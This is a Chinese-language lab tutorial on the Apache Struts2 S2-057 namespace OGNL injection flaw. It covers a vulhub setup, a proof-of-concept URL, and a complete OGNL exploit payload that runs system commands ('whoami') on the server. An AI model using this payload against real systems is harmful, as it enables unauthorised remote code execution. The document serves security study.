struts2框架介绍
Apache Struts2 是一个基于MVC设计模式的 JavaWeb 应用框架。在 MVC 设计模式中,Struts2 作为控制器(Controller)来建立模型与视图的数据交互。Struts2 是在 Struts 和WebWork 的技术的基础上进行合并的全新的框架。Struts2 以 WebWork 为核心,采用拦截器的机制来处理的请求
# MVC:模型(Model)、视图(View)、控制器(Controller):
● 模型 --- 属于软件设计模式的底层基础,主要负责数据维护。
● 视图 --- 这部分是负责向用户呈现全部或部分数据。
● 控制器 --- 通过软件代码控制模型和视图之间的交互。
struts2 rce
Struts 2 在2007年7月23日发布的第一个Struts 2漏洞S2-001 , 到现在已经到披露到 s2-062
不同的Struts 2 版本对应的payload是不同的
环境搭建
cd vulhub-master/struts2/s2-057
docker-compose up -d
漏洞原理
S2-057漏洞产生于网站配置xml的时候,有一个namespace的值,该值并没有做详细的安全过滤导致可以写入到XML上,尤其url标签值也没有做通配符的过滤,导致可以执行远程代码,以及系统命令执行。
S2-057 先决条件 :
alwaysSelectFullNamespace 正确 - 操作元素未设置名称空间属性,或使用了通配符
用户将从 uri 传递命名空间,并将其解析为 OGNL 表达式,最终导致远程代码执行漏洞
补充
OGNL表达式
OGNL(Object-Graph Navigation Language的简称),struts框架使用OGNL作为默认的表达式语言。
它是一种功能强大的表达式语言,通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。
OGNL是通常需要结合Struts 2的标志一起使用的,主要是#、%、$ 这三个符号的使用:
#:获得contest中的数据;
%:强制字符串解析成OGNL表达式;
$:在配置文件中可以使用OGNL表达式。
访问靶场
http://ip:8080/struts2-showcase
poc
http://ip:8080/struts2-showcase/${(123+123)}/actionChain1.action
可以看到中间数字位置相加了 , 说明我们中间的表达式正确的执行了 , 那么我们可以构建可以执行系统命令的表达式进行rce
exp
${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('whoami')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}